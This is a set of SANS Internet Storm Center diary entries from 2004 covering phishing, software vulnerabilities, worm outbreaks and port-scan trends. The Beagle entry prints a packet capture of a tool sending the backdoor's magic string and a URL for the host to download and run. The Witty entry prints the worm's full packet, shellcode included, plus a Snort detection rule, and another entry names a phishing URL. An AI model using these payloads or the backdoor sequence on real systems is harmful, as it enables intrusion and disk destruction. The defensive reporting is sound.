New Phishing Technique
A new phishing attack technique was discovered today in a Citibank scam targeting Citibank customers.
In this technique "the Address bar on the browser is spoofed, using Javascript and frames, the real address bar is suppressed and despite the HTTPS callout in the Address bar, there is no SSL padlock present in the lower corner of the browser."
References: http://www.antiphishing.org/phishing_archive/Citibank_3-31-04.htm
Open Source Vulnerability Data Base
The Open Source Vulnerability Data Base Project made an announcement today about the public availability usage of the Open Source Vulnerability Data Base.
This base intends to be " an open project to collect and distribute vulnerability information freely to everyone" .
" The OSVDB collects vulnerability data on every type of computer software and
operating system. Like other open-source projects, the OSVDB depends on the
wide expertise of its contributors to provide dependable information on many
technologies and security problems. The project's open-source license makes
the results freely available to users worldwide."
The project can be found at http://www.osvdb.org
Pretty calm day today...

Tomorrow is April 1st. Be careful about what you read...
-------------------------------

Pedro Bueno (bueno_AT_ieee.org)

Vulnerability in TCPDUMP versions 3.8.1 and earlier

---------------------------------------------------

An advisory was issued on the BUGTRAQ mailing list indicating a buffer overflow in the popular tcpdump sniffer tool. When processing malformed ISAKMP traffic in verbose display mode, tcpdump is vulnerable to a denial of service attack. This vulnerability is believed to be limited to a denial of service attack at this time. The two vulnerabilities associated with this flaw have been assigned CVE numbers CAN-2004-0183 and CAN-2004-0184. It is recommended that users upgrade their version of tcpdump to the 3.8.3 version to resolve this flaw.


http://www.rapid7.com/advisories/R7-0017.html



Increase in UDP/1027 activity

-----------------------------

UDP/1027 is commonly associated with the Windows messenging service, often used to send "Windows Popup" SPAM messages to unsuspecting victims. We've seen a recent increase in traffic sent to this port, with content ranging from adult website advertisements, to prescription medication sales to deceptive marketing campaigns. Some popup messages even claim to be from Microsoft, offering links to web pages that appear to be a legitimate Microsoft website.


Note that the source addresses for this traffic are always suspect, since they do not require any kind of a response to be effective. An attacker can use any source address they desire to send the UDP traffic to a wide range of targets.


Organizations with stateful firewalls should consider dropping UDP traffic with a destination port of 1026 or 1027 to curtail this kind of activity. If you are seeing these type of popup messages sent to your computer, you should consider investing in a personal firewall product.




Save Your Ship Article

----------------------

Network Magazine has published an article written by the Storm Center Incident Handler Greg Shipley on the process and policy end of patching. The article includes a timeline correlating exploit announcements to worm activity for various Windows, Solaris and Linux worms over the years. The article is informative, insightful and available at:


http://i.cmpnet.com/nc/1506/graphics/1506f1_file.pdf



The illustration for the vulnerability/worm timeline is also available at:
http://i.cmpnet.com/nc/1506/graphics/1506f1a.gif




--Joshua Wright/Handler on Duty

Beagle Virus Exploit

====================


Versions of the 'Beagle' (aka Bagle) virus open a back door on port 2745
(TCP). We do monitor increased scanning activity
for this port. Today, a reader submitted a tool which is
used to scan for Beagle infected systems. If the tool finds
port 2745 open, it will send the 'magic string' to open the
backdoor. Next, a URL is send to the system. The Bagle infected system
will attempt to download the content of the URL and execute it.

Sample session (using a netcat listener):

1. Establish TCP connection to port 2745

18:29:09.159691 10.1.0.129.1043 > 10.1.0.13.2745: S

2963418754:2963418754(0) win 16384 <mss 1460,nop,nop,sackOK> (DF)

0x0000   4500 0030 0084 4000 8006 e5b4 0a01 0081        E..0..@.........

0x0010   0a01 000d 0413 0ab9 b0a2 2e82 0000 0000        ................

0x0020   7002 4000 409f 0000 0204 05b4 0101 0402        p.@.@...........

18:29:09.159784 10.1.0.13.2745 > 10.1.0.129.1043: S

3650381978:3650381978(0) ack 2963418755 win 5840 <mss

1460,nop,nop,sackOK> (DF)

0x0000   4500 0030 0000 4000 4006 2639 0a01 000d        E..0..@.@.&9....

0x0010   0a01 0081 0ab9 0413 d994 689a b0a2 2e83        ..........h.....

0x0020   7012 16d0 278f 0000 0204 05b4 0101 0402        p...'...........

18:29:09.160207 10.1.0.129.1043 > 10.1.0.13.2745: . ack 1 win 17520 (DF)

0x0000   4500 0028 0085 4000 8006 e5bb 0a01 0081        E..(..@.........

0x0010   0a01 000d 0413 0ab9 b0a2 2e83 d994 689b        ..............h.

0x0020   5010 4470 26b3 0000 0204 05b4 0101             P.Dp&.........

2. Send "exploit buffer"

18:29:09.161325 10.1.0.129.1043 > 10.1.0.13.2745: P 1:18(17) ack 1 win

17520 (DF)

0x0000   4500 0039 0086 4000 8006 e5a9 0a01 0081        E..9..@.........

0x0010   0a01 000d 0413 0ab9 b0a2 2e83 d994 689b        ..............h.

0x0020   5018 4470 ef7f 0000 43ff ffff 3030 3001        P.Dp....C...000.

0x0030   0a1f 2b28 2ba1 3201 00                         ..+(+.2..

18:29:09.161413 10.1.0.13.2745 > 10.1.0.129.1043: . ack 18 win 5840 (DF)

0x0000   4500 0028 8cbe 4000 4006 9982 0a01 000d        E..(..@.@.......

0x0010   0a01 0081 0ab9 0413 d994 689b b0a2 2e94        ..........h.....

0x0020   5010 16d0 5442 0000 0000 0000 0000             P...TB........

3. 'reply' from infected host (just 'CR' in this case)

18:29:18.391801 10.1.0.13.2745 > 10.1.0.129.1043: P 1:2(1) ack 18 win

5840 (DF)

0x0000   4500 0029 8cbf 4000 4006 9980 0a01 000d        E..)..@.@.......

0x0010   0a01 0081 0ab9 0413 d994 689b b0a2 2e94        ..........h.....

0x0020   5018 16d0 4a39 0000 0a00 0000 0000             P...J9........

4. send URL for download

18:29:18.393460 10.1.0.129.1043 > 10.1.0.13.2745: P 18:23(5) ack 2 win

17519 (DF)

0x0000   4500 002d 0087 4000 8006 e5b4 0a01 0081        E..-..@.........

0x0010   0a01 000d 0413 0ab9 b0a2 2e94 d994 689c        ..............h.

0x0020   5018 446f 1ab8 0000 2768 7474 7046             P.Do....'http

Mailbag: Port 12345 scans

=========================


a user submitted logs showing large numbers of scans against
port 12345 (TCP). This port is commonly associated with the trojan
'Netbus' and other malware. The log did not indicate a new tool
but rather appears to be a number of sequential connect scans.

Ports in focus: 1026

====================


scans for port 1026 appear to increase again over the last
couple weeks. According to some reports, this is due to popup
spam, which now relies more on compromised systems as origin.

http://isc.sans.org/port_details.html?port=1026

In the past, only a small number of sources originated this
traffic.

SSL "NULL" Encryption (Errata)

==============================


An earlier diary ( http://isc.sans.org/diary.html?date=04-03-04 )
quoted Dr. Neal Krawetz, from Secure Science Corporation as saying
that "One of the SSL encoding methods is "plain text". Most SSL servers
have this disabled by default, but most browsers support it. When plain
text is used, no central certificate authority is consulted and the user
never sees a message asking if a certificate should be accepted (because
"plain text" doesn't use certificates). Keeping that in mind, the little
lock icon may not even indicate an encrypted channel. The little lock
only indicates an SSL connection"

Prompted by reader feedback, we did our own experiments, limiting an
Apache 1.3 server to 'NULL' encryption. We were not able to reproduce
this issue with any recent browser.

Mozilla, in default configuration, will popup an error dialog stating
that no common cipher could be found. If the 'null'/'plain text'
encryption is specifically enabled, the page will load, but the
certificate will still be validated and any errors will be communicated
to the user

Microsoft Internet Explorer will show a generic error page. It does
not appear to be possible in MSIE 6 to enable 'NULL' encryption.

---------------------------------------------

Johannes Ullrich, jullrich_AT_sans.org

Activity Increase on Port 12345

There is an increase in traffic for the targets and records for port
12345.



http://isc.incidents.org/port_details.html?port=12345



The source numbers are staying constant. If anyone has any captures of
this traffic please let us know.

More Phishing

We received an active Phishing scam to retrieve a user's ID and password
from WestPac Online Banking.
This attempt takes you to an actual Westpac site where you get a 404 Not
Found error and then a pop up
on top that asks for your information. The popup is located at:



http://deretlens.info/west/westpac.php.



The site is still active at this time. More information can also be
found at:



http://www.antiphishing.org/phishing_archive/westpac_03-26-04.htm




Ethereal Exploit Code

The exploit code against the latest Ethereal vulnerabilities has been
published. It is important to ensure that you have
upgraded to 0.10.3. For more information see:



http://isc.incidents.org/diary.html?date=2004-03-23

http://www.ethereal.com/appnotes/enpa-sa-00013.html




--------------------------------------------------

Handler on Duty: Lorna J. Hutcheson

Exploit for Cisco Vulnerabilities Released

Exploit for Cisco vulnerabilities has been released. It targets several Cisco previous vulnerabilities in various Cisco products. Following Cisco advisories on upgrading/workarounds should protect your systems from such threats.

For more information, please refer to Cisco Security Notice:

http://www.cisco.com/warp/public/707/cisco-sn-20040326-exploits.shtml

ISS Default Misconfiguration Problem

Today ISS notified its customers of a problem discovered in the default configuration of some versions of their RealSecure and BlackICE products. "This misconfiguration changes the default blocking and reporting behavior and may affect your level of protection. While the most current releases block most of the major threats (including Blaster, Nachi, Slammer, and Witty), ISS strongly recommends that customers update to this new release to provide maximum coverage for all threats."

http://www.iss.net/support/

New Bagel Variant: Bagel.U

New Bagel o' the Day: Bagel.U. This is the 21st variant classified. Noteworthy: unlike previous versions that used "tricky subject lines or enticing messages" this one arrives as an attachment to an otherwise empty message.

http://www.computerworld.com/securitytopics/security/virus/story/0,10801,91678,00.html
http://www.sarc.com/avcenter/venc/data/w32.beagle.u@mm.html

Witty Notes

A couple of article links that discuss security products being targeted, and the weakness of patch-based security.

http://www.computerworld.com/securitytopics/security/holes/story/0,10801,91688p2,00.html
http://news.com.com/2100-7355_3-5180482.html?tag=nefd_top
-------------------------------------------------------------------

Handler on duty: Dave Brookshire

DoS from 127.0.0.1

We have received log files of a reported DoS attack with a source
address of 127.0.0.1 (loopback). The packets were TCP resets (RST) with
a source port of 80 and destination port between 1000-2000. No data was
contained in the packets.

After analysis, these packets appear to be fall-out from the Blaster
worm. If service providers or network administrators changed the
windowsupdate.com address to resolve to 127.0.0.1, a host infected with
Blaster will attempt to perform a DoS against itself (127.0.0.1). The
problem with this approach is that the worm spoofs the source address
before sending the packet. When the infected machine's TCP/IP stack
receives the packet (TCP 80 SYN request), it attempts to respond to the
spoofed source IP address with TCP RST. The spoofed IP addresses are a
random number based on the machine's CLASS B address.

If you have identified such behavior on your network, you can attempt
to trace the infected machine by MAC address. And send us some logs of
the activity so we can compare your incident to the others we have
received.

More information on the Blaster worm can be found at your favorite
anti-virus site.

------------------------------------------------------------------------

Server compromise at gnome.org

The GNOME project suspects a compromise on several servers. GNOME is an
open-source project that provides UNIX and Linux desktop similar to the
KDE desktop environment. It appears that no source code or distribution
files were modified.

Source:
http://mail.gnome.org/archives/gnome-announce-list/2004-March/msg00113.html

"We've discovered evidence of an intrusion on the server hosting
www.gnome.org and other gnome.org websites. At the present time, we
think that the released gnome sources and the gnome source code
repository are unaffected.

We are investigating further and will provide updates as we know more.
We hope to have the essential services hosted on the affected machine
up and running again as soon as possible.

The GNOME sysadmin team
23 March 2003"

A follow-up e-mail was posted to the GNOME mailing list that shows they
are making fast progress in restoring the services on these machines:
http://mail.gnome.org/archives/gnome-announce-list/2004-March/msg00113.html

------------------------------------------------------------------------

Netsky.P still spreading

The Netsky.P virus/worm is still spreading according to antivirus sites
and we continue to see it in our mailboxes. One of the possible e-mail
messages it sends contains a FROM: address of well-known anti-virus
companies and the following message:

The sample file you sent contains a new virus version of mydoom.j.
Please clean your system with the attached signature.
Sincerly,
Robert Ferrew

It may also append the following text, substituting any popular anti-
virus company name:
+++ Attachment: No Virus found +++ MC-Afee AntiVirus - www.mcafee.com

[EOF]

Netsky.P Triggered

-------------------------------------------------------------------



One of the lastest Netsky variants, Netsky.P, triggered and began mass mailing infected messages on March 24th between 1500 and 1800 GMT (assuming that the infected machine's clock is set correctly). Message Labs is reporting that it had intercepted over 200,000 messages as of midnight GMT.



More info:



http://www.messagelabs.com/viruseye/info/netskyp.asp





MSVC++ Constructed ISAPI Applications DoS

-------------------------------------------------------------------



Secunia is reporting that all applications constructed with Microsoft Visual C++ and MFC (Microsoft Foundation Classes) that use ISAPI (Internet Server Application Programming Interface) extensions may be vulnerable to DoS attacks.



The issue affects both Microsoft Visual C++ 6.0 and Microsoft Visual Studio 6.0 prior to Service Pack 6. Under heavy loads, applications compiled with the ISAPI extensions may produce invalid results when processing POST data, possibly resulting in access violations.



Recompiling applications after installing Service Pack 6 will fix the problem.



More info:



http://secunia.com/advisories/11199/





-------------------------------------------------------------------

Handler on duty: Tom Liston - < http://www.labreatechnologies.com >

No news in the witty front...Back to Infocon 'GREEN'.

For information about the Witty worm check previous diaries:

http://isc.sans.org/diary.html?date=2004-03-20

http://isc.sans.org/diary.html?date=2004-03-22
Multiple Vulnerabilities in Ethereal
Ethereal released an advisory today about multiple vulnerabilities in
version 0.10.2. According the advisory, by exploring this
vulnerability, it is possible to make Ethereal to crash or execute
arbitrary code "by injecting a purposefully malformed packet onto the
wire, by convincing someone to read a malformed packet trace file, or
by creating a malformed color filter file."
The solution is to upgrade to version 0.10.3.
At the time that this diary is written, the is no version 0.10.3
available to download in ethereal website.
References: http://www.ethereal.com/appnotes/enpa-sa-00013.html
New Netsky Variant
Symantec moved the new Netsky variant to level 3. The netsky.p variant also
uses a vulnerability in IE to execute E-mail attachments. This is a known flaw and has a patch available since 2001.
Reference: http://www.eweek.com/article2/0,1759,1552315,00.asp
------------------------------------------------

Handler on Duty: Pedro Bueno (bueno_AT_ieee.org)

Witty Worm Wrap-up

For our more technical discussion about the Witty worm, see Saturdays diary:

http://isc.sans.org/diary.html?date=2004-03-20
We expect to return to infocon 'GREEN' later today.

Witty Worm Traffic

Infected machines generated outbound UDP traffic at line speed, frequently saturating local area networks. As a result, the traffic generated was high compared to the number of infected hosts. At this time, we have reports for about 20,000 unique IP addresses sending UDP packets from port 4000 over the weekend. The traffic rose very fast, and dropped within the first hour. This is likely a result of the Witty worm's destructive component, which will crash infected systems and prevent them from rebooting.

Graphs

Witty traffic (packets reported): http://isc.sans.org/images/witty1.jpg

Unique IPs per hour: http://isc.sans.org/images/witty2.jpg

Geographic Animation: http://isc.sans.org/witty.html
(this diary will be updated throughout the day)

--------------

Johannes Ullrich, jullrich_AT_sans.org

(Note: we will not start new diaries this weekend. Instead, we will keep amending this diary)
"Witty" worm attacks BlackICE firewall
Summary

=======

At around 12:00 AM EST (05:00 UTC) on Saturday, we detected an upsurge
in UDP traffic from source port 4000. This traffic is caused by a new
worm ("Witty") which exploits a vulnerability in BlackIce's ICQ parser.

Given that this worm generates large amounts of traffic, and the wide
spread use of BlackIce, we will keep the InfoCon level at 'YELLOW',
likely until Monday morning.
While "witty" packets with other source ports are seen, they will not
trigger the vulnerability. Likely, these packets are due to infected
hosts behind NAT devices.
Detection

=========

Infected hosts will send large amounts of UDP traffic, typically
saturating a local network connection. The BlackIce task bar icon will
no longer allow the user to shut down BlackIce. It will display a
message reading "Operation could not be completed. Access is denied".


Eventually, the system will crash. Infected systems are reported to
show corrupted hard disks.


The worm will not write itself to disk. As a result, Virus scanners
may not detect it.


Snort rule by ISC Handler Pedro Bueno:

alert udp any 4000:5000 -> any any (msg:"Witty Initial Traffic";

content:"|29202020202020696e73657274207769747479206d6573736167652068657265|";rev:1;)

(note: you may want to remove the source port restriction)
Snort.org has posted additional rules to "detect the worms and should any other exploits based off of the same vulnerability."
Removal

=======

A reboot will remove the worm from the system. However, the worm
causes random hard disk corruption and the system may no longer
function. The ISS XForce has directions that _may_ help recovering some less severely Corrupted systems. These directions are available at http://xforce.iss.net/xforce/alerts/id/167 .
Prevention

==========

Disconnect systems running BlackIce as soon as possible!



Block all UDP packets with a source port of 4000
Blocking UDP packets with a source port of 4000 may disrupt
some network services. We do no know of any major services
(other then old versions of ICQ) that require UDP 4000)


This worm will corrupt hard disks and leave systems
unusable.


These versions of BlackIce and RealSecure have been identified
as vulnerable:
BlackICE™ Agent for Server 3.6 ebz, ecd, ece, ecf

BlackICE PC Protection 3.6 cbz, ccd, ccf

BlackICE Server Protection 3.6 cbz, ccd, ccf

RealSecure® Network 7.0, XPU 22.4 and 22.10

RealSecure Server Sensor 7.0 XPU 22.4 and 22.10

RealSecure Desktop 7.0 ebf, ebj, ebk, ebl

RealSecure Desktop 3.6 ebz, ecd, ece, ecf

RealSecure Guard 3.6 ebz, ecd, ece, ecf

RealSecure Sentry 3.6 ebz, ecd, ece, ecf

Other ISS products may be vulnerable as well. Please refer to ISS
for details (see end of this post for links).
Links

=====
* Internet Security Systems Information
ISS Witty Worm Announcement: http://www.iss.net/support/wittyworm.php

ISS XForce Security Alert: http://xforce.iss.net/xforce/alerts/id/167

ISS XForce Security Alert: http://xforce.iss.net/xforce/alerts/id/166

ISS Software Updates (Enterprise): http://www.iss.net/download/

BlackIce Updates (Consumer): http://blackice.iss.net/update_center/index.php
* Third Party Information
Matt Murphy's Analysis: http://www.netsecure.shawbiz.ca/witty-analysis.html

Lurhq Analysis: http://www.lurhq.com/witty.html

eEye Security Advisory: http://www.eeye.com/html/Research/Advisories/AD20040318.html

F-Secure Analysis: http://www.f-secure.com/v-descs/witty.shtml

Symantec Analysis: http://securityresponse.symantec.com/avcenter/venc/data/w32.witty.worm.html

Snort Rules: http://www.snort.org

SecurityFocus Vulnerabilty Information: http://www.securityfocus.com/bid/9913

Secunia Advisory: http://secunia.com/advisories/11073/

USCert Security Update: http://www.uscert.gov/current/current_activity.html#witty

USCert Vulnerability Update: http://www.kb.cert.org/vuls/id/947254
Sample Packet

=============

01:54:45.699383 219.154.156.161.4000 > 65.173.218.164.50212:  udp 997

0x0000   4500 0401 d3b4 0000 7111 dda9 db9a 9ca1        E.......q.......

0x0010   41ad daa4 0fa0 c424 03ed dd38 0500 0000        A......$...8....

0x0020   0000 0012 0200 0000 0000 0000 0000 0000        ................

0x0030   0002 2c00 0500 0000 0000 006e 0000 0000        ..,........n....

0x0040   0000 0000 0000 0000 0000 0000 0001 0000        ................

0x0050   0000 0000 0000 0000 0000 0000 0000 0000        ................

0x0060   4102 0500 0000 0000 00de 0300 0000 0000        A...............

0x0070   0000 0000 0000 0000 0000 0100 0001 0000        ................

0x0080   0100 001e 0220 2020 2020 2020 285e 2e5e        ............(^.^

0x0090   2920 2020 2020 2069 6e73 6572 7420 7769        )......insert.wi

0x00a0   7474 7920 6d65 7373 6167 6520 6865 7265        tty.message.here

0x00b0   2e20 2020 2020 2028 5e2e 5e29 2020 2020        .......(^.^)....

0x00c0   2020 2089 e78b 7f14 83c7 0881 c4e8 fdff        ................

0x00d0   ff31 c966 b933 3251 6877 7332 5f54 3eff        .1.f.32Qhws2_T>.

0x00e0   159c 400d 5e89 c331 c966 b965 7451 6873        ..@.^..1.f.etQhs

0x00f0   6f63 6b54 533e ff15 9840 0d5e 6a11 6a02        ockTS>...@.^j.j.

0x0100   6a02 ffd0 89c6 31c9 5168 6269 6e64 5453        j.....1.QhbindTS

0x0110   3eff 1598 400d 5e31 c951 5151 81e9 feff        >...@.^1.QQQ....

0x0120   f05f 5189 e16a 1051 56ff d031 c966 b974        ._Q..j.QV..1.f.t

0x0130   6f51 6873 656e 6454 533e ff15 9840 0d5e        oQhsendTS>...@.^

0x0140   89c3 83c4 3c31 c951 6865 6c33 3268 6b65        ....<1.Qhel32hke

0x0150   726e 543e ff15 9c40 0d5e 31c9 5168 6f75        rnT>...@.^1.Qhou

0x0160   6e74 6869 636b 4368 4765 7454 5450 3eff        nthickChGetTTP>.

0x0170   1598 400d 5eff d089 c583 c41c 31c9 81e9        ..@.^.......1...

0x0180   e0b1 ffff 5131 c02d 03bc fcff f7e5 2d3d        ....Q1.-......-=

0x0190   61d9 ff89 c131 c02d 03bc fcff f7e1 2d3d        a....1.-......-=

0x01a0   61d9 ff89 c531 d252 52c1 e910 6689 c850        a....1.RR...f..P

0x01b0   31c0 2d03 bcfc fff7 e52d 3d61 d9ff 89c5        1.-......-=a....

0x01c0   30e4 b002 5089 e06a 1050 31c0 502d 03bc        0...P..j.P1.P-..

0x01d0   fcff f7e5 2d3d 61d9 ff89 c5c1 e817 80c4        ....-=a.........

0x01e0   0350 5756 ffd3 83c4 1059 e298 31c0 2d03        .PWV.....Y..1.-.

0x01f0   bcfc fff7 e52d 3d61 d9ff 89c5 c1e8 1080        .....-=a........

0x0200   e407 80cc 30b0 4550 6844 5249 5668 4943        ....0.EPhDRIVhIC

0x0210   414c 6850 4859 5368 5c5c 2e5c 89e0 31c9        ALhPHYSh\\.\..1.

0x0220   51b2 20c1 e218 526a 0351 6a03 d1e2 5250        Q.....Rj.Qj...RP

0x0230   3eff 15dc 400d 5e83 c414 31c9 81e9 e0b1        >...@.^...1.....

0x0240   ffff 3dff ffff ff0f 8437 ffff ff56 89c6        ..=......7...V..

0x0250   31c0 5050 2d03 bcfc fff7 e52d 3d61 d9ff        1.PP-......-=a..

0x0260   89c5 d1e8 6689 c850 563e ff15 c440 0d5e        ....f..PV>...@.^

0x0270   31c9 5189 e251 52b5 80d1 e151 b15e c1e1        1.Q..QR....Q.^..

0x0280   1851 563e ff15 9440 0d5e 563e ff15 3840        .QV>...@.^V>..8@

0x0290   0d5e 5e5e e9ac feff ff63 7607 5ee9 21fe        .^^^.....cv.^.!.

0x02a0   ffff 0043 666a 7663 6c62 3431 5051 3530        ...Cfjvclb41PQ50

0x02b0   6a48 3150 6334 5051 5559 4878 3774 654f        jH1Pc4PQUYHx7teO

0x02c0   7a54 5354 5954 654c 4d41 0d0a 446c 4433        zTSTYTeLMA..DlD3

0x02d0   5237 6c56 7442 4375 6b6b 6864 7a2b 3276        R7lVtBCukkhdz+2v

0x02e0   6f75 3033 4163 3557 4f52 6b75 7172 6764        ou03Ac5WORkuqrgd

0x02f0   4b72 7531 5a49 4f43 6c53 522f 7851 4f69        Kru1ZIOClSR/xQOi

0x0300   4b6f 3648 7a4a 7567 5272 4934 7337 4f6b        Ko6HzJugRrI4s7Ok

0x0310   534b 7750 714c 7534 0d0a 3562 614e 6252        SKwPqLu4..5baNbR

0x0320   3067 504e 5950 4000 3406 b662 4044 5219        0gPNYP@.4..b@DR.

0x0330   928e 0442 6741 6241 4630 4544 4141 5741        ...BgAbAF0EDAAWA

0x0340   4141 4141 4141 4141 4131 3833 223e 0a20        AAAAAAAAA183">..

0x0350   2020 2020 8001 0000 4600 0000 4600 0000        ........F...F...

0x0360   8000 0000 0200 0000 66cc 5b40 ef1c 0d00        ........f.[@....

0x0370   83e1 00b0 1100 0600 d003 0000 d003 0000        ................

0x0380   0004 0000 0200 0000 aacc 5b40 0e27 0700        ..........[@.'..

0x0390   83e1 0000 0000 0002 00b0 d02b a49b 0800        ...........+....

0x03a0   4500 03c2 0a72 0000 8011 0000 83e1 1bb1        E....r..........

0x03b0   ba54 02a2 0fa0 06a5 03ae eb72 0500 0000        .T.........r....

0x03c0   0000 0012 0200 0000 0000 0000 0000 0000        ................

0x03d0   0002 2c00 0500 0000 0000 006e 0000 0000        ..,........n....

0x03e0   0000 0000 0000 0032 5e80 1d33 1d20 0c95        .......2^..3....

0x03f0   8310 167b 1100 0700 4600 0000 4600 0000        ...{....F...F...

0x0400   80                                             .

-----------------------------------------------------------------------

Johannes Ullrich, jullrich_AT_sans.org - SANS Institute.
Scott Fendley, scottf _AT_ uark.edu - University of Arkansas-Fayetteville

Microsoft Releases a Preview of Service Pack 2 for Windows XP


To aid IT professionals in planning and testing for the deployment of Windows XP SP2. Microsoft is making available a preview, based on Release Candidate 1 of the SP2.



WARNING! This technical preview is unsupported and is intended for testing purposes only. Do not use in production environments.



http://www.microsoft.com/sp2preview/


Apache HTTP Server 2.0.49 Released



According to the release information, this release is a bug fix release to fix bugs that were found in version 2.0.48 three which were security vulnerabilities.


** When using multiple listening sockets, a denial of service attack is possible on some platforms due to a race condition in the handling of short-lived connections.


** Arbitrary client-supplied strings can be written to the error log
which can allow exploits of certain terminal emulators.


** A remotely triggered memory leak in mod_ssl can allow a denial
of service attack due to excessive memory consumption.


The new release is available for download at:
http://httpd.apache.org/download.cgi


A overview of the release can be found at:
http://httpd.apache.org/docs-2.0/new_features_2_0.html




Don't Click that Attachment


No matter how many times we say it, no matter how often it is repeated, we obviously can't say it enough. DON'T CLICK ON THE ATTACHMENT!


Today a small business that I am involved with called me in a panic. Something was wrong with their network. After much probbing and proding, I finally got it out of them. Someone had clicked on an attachment that they had received in an email.

It appears that one of the gals had gotten an email from the "administrator" that indicated that her "email account was being disabled due to misuse". Of course it was from the administrator so it must be legitimate (even though she had NEVER gotten an email from the administrator before). I immediately knew what had happened but was a little confused by how it had happened. They had an anti-virus program installed and it was set up to auto-update every week.


Hop in the car and go to their office to check it out. Upon arrival I discovered the problem, they had installed an update to a software program that they use. The update required them to disable their antivirus program for installation of the update. You guessed it, they disabled the AV on all of the computers to install the client side of the update and forgot to re-enable it. Consequently they had NO protection at all.


While taking care of things at this location, I received a call from their location about 20 miles away. Yep, you guessed it, they had received an email from administrator, and they had disabled the AV for the program update. Finishing the cleanup at the first location I headed to the second location to clean that one up too.


I think this company learned two valuable lessons today!


1. Don't click on attachments in emails regardless of who they come from!

2. Don't disable your anti-virus software. If you do have to in order to do a program update, make sure you turn it back on.


Maybe someday all software companies will figure out how to install their software updates without disabling the AV software. Until then, we have to protect ourselves!




Deb Hale